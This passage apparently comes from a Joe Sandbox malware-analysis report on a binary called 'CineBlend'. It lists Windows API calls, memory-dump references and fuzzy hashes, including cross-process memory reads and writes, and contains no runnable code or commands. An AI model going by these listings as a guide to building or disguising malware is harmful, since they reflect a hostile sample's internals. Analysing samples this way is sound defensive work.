                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$_wcslen
                                          • String ID:
                                          • API String ID: 763830540-0
                                          • Opcode ID: 07c9447aff9328b132a248d0b6bc8918f48fa2035a550cb30241353c149d9582
                                          • Instruction ID: 3b3acaf32c6dc17d740340b66dac6c38892b3881c4848879b411d4a90a8d60c7
                                          • Opcode Fuzzy Hash: 07c9447aff9328b132a248d0b6bc8918f48fa2035a550cb30241353c149d9582
                                          • Instruction Fuzzy Hash: F0217E759006199AEB209FA4CC84AEEFBF8EB15324F104297F925EB280E7709985CF50
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00BC13AE
                                          • GetForegroundWindow.USER32 ref: 00BC13C5
                                          • GetDC.USER32(00000000), ref: 00BC1401
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00BC140D
                                          • ReleaseDC.USER32(00000000,00000003), ref: 00BC1445
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          • Opcode ID: 101a8566a739a10b0adb2085dec8be57716ca68725c210484ac8e59c741a92d2
                                          • Instruction ID: 339f8802b02126017e34624707ba87eede6eb89f11b25036a6bc76b9e9b72f63
                                          • Opcode Fuzzy Hash: 101a8566a739a10b0adb2085dec8be57716ca68725c210484ac8e59c741a92d2
                                          • Instruction Fuzzy Hash: 81218135601204AFD704EF65CC94EAEBBF5EF89300B0484A9E89A97761DA70ED00DB90
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00B7D146
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B7D169
                                            • Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B7D18F
                                          • _free.LIBCMT ref: 00B7D1A2
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B7D1B1
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: a6528bda3ab506336eb5eda50b656e7cd46393971cb035987fd0c021205108d8
                                          • Instruction ID: b64b5be0cbb650324c9d6afde9a840545797832290e405df3490889d38571c86
                                          • Opcode Fuzzy Hash: a6528bda3ab506336eb5eda50b656e7cd46393971cb035987fd0c021205108d8
                                          • Instruction Fuzzy Hash: D201D4726066157F3321277A5C8CD7BABFDDEC2BE135481AAFC18E3240EE608C0181B0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: c60146505ed326a23557b9e8d2c61a7ce575ff0a7960d0949283308fe927ea5b
                                          • Instruction ID: a3fccfaee9f19a7323282453d8a8c9c00545fb153d4fa79cf2e8e776445f2d87
                                          • Opcode Fuzzy Hash: c60146505ed326a23557b9e8d2c61a7ce575ff0a7960d0949283308fe927ea5b
                                          • Instruction Fuzzy Hash: D001F5E26083057BD32066255CC2FBB73DDDE22399B0808A1FD059A241E761ED90C2A0
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?,?,00BA0C4E), ref: 00BA091B
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0936
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0944
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?), ref: 00BA0954
                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0960
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: 666730022d259876919344d85cc4ec1dd0cca02d828b796b1a5091747267ccd6
                                          • Instruction ID: 96357a7bacce55e30043302a5ee381e7a35f8143d215a5d90986ee14e92f62bc
                                          • Opcode Fuzzy Hash: 666730022d259876919344d85cc4ec1dd0cca02d828b796b1a5091747267ccd6
                                          • Instruction Fuzzy Hash: FA01DF72615205AFEB015F58DC48B9BBBEDEB44751F104065F945E3211EB71DD009BA0
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00BAF2AE
                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00BAF2BC
                                          • Sleep.KERNEL32(00000000), ref: 00BAF2C4
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00BAF2CE
                                          • Sleep.KERNEL32 ref: 00BAF30A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: 80986f13a45a20638b1185c03a94e38ae8f08c30896e9c740cd51289706ef80f
                                          • Instruction ID: f6574751e7fc7dba9c761cc6199f6013e04067f340b5c0e44be1dd389a3f45d5
                                          • Opcode Fuzzy Hash: 80986f13a45a20638b1185c03a94e38ae8f08c30896e9c740cd51289706ef80f
                                          • Instruction Fuzzy Hash: B5010975D0561AEBCF00AFE4EC59AEDBBB9FB0A701F0104A6E542B2250DB309554C7A5
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA1A60
                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A6C
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A7B
                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A82
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA1A99
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: a269c3a797689c1685429932d3bfa74ec0d2111e115baf96f52578977b739ddc
                                          • Instruction ID: 176b879241b9020b62d076d6a49a693b88d227f8742c3f8cbd343b145cc4cb60
                                          • Opcode Fuzzy Hash: a269c3a797689c1685429932d3bfa74ec0d2111e115baf96f52578977b739ddc
                                          • Instruction Fuzzy Hash: 6A0181B5642605BFDB114F68DC58D6A7BADEF85364F210455F985D3260EE31DC408A60
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA1916
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA1922
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA1931
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BA1938
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA194E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: e14817da2b8eb0081a6294a0884eb20df49c207fefa04583aa2b778f44dccc9b
                                          • Instruction ID: d510ad377f2890974e29bd632865bec538465c5c23f9cf49b47c52e393c681a8
                                          • Opcode Fuzzy Hash: e14817da2b8eb0081a6294a0884eb20df49c207fefa04583aa2b778f44dccc9b
                                          • Instruction Fuzzy Hash: 9CF04F75141312BBDB210F699C6DF577BADEF897A0F100415FA85D7250DE70DC01CA60
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA1976
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1982
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1991
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1998
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA19AE
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 578490124fbc6b1a59ca81638b6d2367e0a9d61ce92ecda6de48c947102d6ff3
                                          • Instruction ID: d07271b177ea2b383926ab1d3934dae0c35d566958829da0c0b251a8f1b13613
                                          • Opcode Fuzzy Hash: 578490124fbc6b1a59ca81638b6d2367e0a9d61ce92ecda6de48c947102d6ff3
                                          • Instruction Fuzzy Hash: 0DF0C275105311BBD7211F68EC68F577BADEF893A0F100411FA85D7250DE30D801CA60
                                          APIs
                                          • CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CCB
                                          • CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CD8
                                          • CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CE5
                                          • CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CF2
                                          • CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CFF
                                          • CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0D0C
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 5156387a58e3f9f35b0d804ad63d99cffbe268c81b25a2fa110f58effd0cf2a9
                                          • Instruction ID: f0587e911d0ff2f7ad0d1bd0e22917d51e35d18373b9dbe78d62788d6bee76ff
                                          • Opcode Fuzzy Hash: 5156387a58e3f9f35b0d804ad63d99cffbe268c81b25a2fa110f58effd0cf2a9
                                          • Instruction Fuzzy Hash: 6D01DC71800B05CFCB30AFA6D880867FBF9FE602153108A7ED09652931C7B0A848CE80
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00BA65BF
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00BA65D6
                                          • MessageBeep.USER32(00000000), ref: 00BA65EE
                                          • KillTimer.USER32(?,0000040A), ref: 00BA660A
                                          • EndDialog.USER32(?,00000001), ref: 00BA6624
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: b37ecf11e5b0901db22beb00d89f3a078ef1c08098f705d4347272152b334529
                                          • Instruction ID: 3c78bad8c921b6ca64234a5e829b994b6fe6ddb3cfb32d36fc97ce011191e5fe
                                          • Opcode Fuzzy Hash: b37ecf11e5b0901db22beb00d89f3a078ef1c08098f705d4347272152b334529
                                          • Instruction Fuzzy Hash: 8C018670945304ABEB205F24DD5EB96BBB8FF11705F04059AA5C6620E1EFF0AA448B90
                                          APIs
                                          • _free.LIBCMT ref: 00B7DAD2
                                            • Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
                                            • Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60
                                          • _free.LIBCMT ref: 00B7DAE4
                                          • _free.LIBCMT ref: 00B7DAF6
                                          • _free.LIBCMT ref: 00B7DB08
                                          • _free.LIBCMT ref: 00B7DB1A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 0b26edbd1ad694aa5a7ace203afa030070b5c39ad05d78639b534943849870de
                                          • Instruction ID: 2c16d0b60a8774487e3b8c1a8718d2c123ef939b4e7eeb0b292e041e391328f2
                                          • Opcode Fuzzy Hash: 0b26edbd1ad694aa5a7ace203afa030070b5c39ad05d78639b534943849870de
                                          • Instruction Fuzzy Hash: 48F01232544214ABC624EB98E982E1A77EDFE047507968CD5F12ED7542CB30FC80C694
                                          APIs
                                          • _free.LIBCMT ref: 00B7262E
                                            • Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
                                            • Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60
                                          • _free.LIBCMT ref: 00B72640
                                          • _free.LIBCMT ref: 00B72653
                                          • _free.LIBCMT ref: 00B72664
                                          • _free.LIBCMT ref: 00B72675
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 69965357a629eea9fee7ed6258f407ce7f2af9c75de4999d777aef29661b6a31
                                          • Instruction ID: 00d4e4abf77ee976859584f248f9bd5bc4543df46dc25bbcd304b5b16985a0dc
                                          • Opcode Fuzzy Hash: 69965357a629eea9fee7ed6258f407ce7f2af9c75de4999d777aef29661b6a31
                                          • Instruction Fuzzy Hash: 0EF0D074402111DBC721AF94FC01B8C37A4FB26761706CAD7F429962B6C7354912EFC4
                                          APIs
                                          • EndPath.GDI32(?), ref: 00B41EC8
                                          • StrokeAndFillPath.GDI32(?,?,00B83294,00000000,?,?,?), ref: 00B41EE4
                                          • SelectObject.GDI32(?,00000000), ref: 00B41EF7
                                          • DeleteObject.GDI32 ref: 00B41F0A
                                          • StrokePath.GDI32(?), ref: 00B41F25
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: 5191b97a0c85370bab51c7bbb67315d6351be09a14c2361cce32391600e0509e
                                          • Instruction ID: 08a044192cc6442a171f9a25de2946f3169b9f27dc7e09671d6310213e4ebc6a
                                          • Opcode Fuzzy Hash: 5191b97a0c85370bab51c7bbb67315d6351be09a14c2361cce32391600e0509e
                                          • Instruction Fuzzy Hash: 55F01938006204EBDB169F5CED19BA83BA5FB42332F04D259E469490F0DB3189A6EF10
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: __freea$_free
                                          • String ID: a/p$am/pm
                                          • API String ID: 3432400110-3206640213
                                          • Opcode ID: 568a8a9b490b6ef5aaec0662e73901de8684dba0003121753be56b0582cfbc0c
                                          • Instruction ID: 78eff17a4e49f191ed249e9346d7c81a64f50752d2532b391f577b28f7c7f848
                                          • Opcode Fuzzy Hash: 568a8a9b490b6ef5aaec0662e73901de8684dba0003121753be56b0582cfbc0c
                                          • Instruction Fuzzy Hash: 73D105759102069ACB289F6CC8957BAB7F5FF15700F28C9DAE52AAB250D335DD40CBB0
                                          APIs
                                            • Part of subcall function 00BABDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA2B1D,?,?,00000034,00000800,?,00000034), ref: 00BABDF4
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BA30AD
                                            • Part of subcall function 00BABD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00BABDBF
                                            • Part of subcall function 00BABCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00BABD1C
                                            • Part of subcall function 00BABCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BA2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00BABD2C
                                            • Part of subcall function 00BABCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BA2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00BABD42
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA311A
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA3167
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 828222ef6b08234bb664796eaf79b68ed7aa6535dd202147cf6cf2722d082dc4
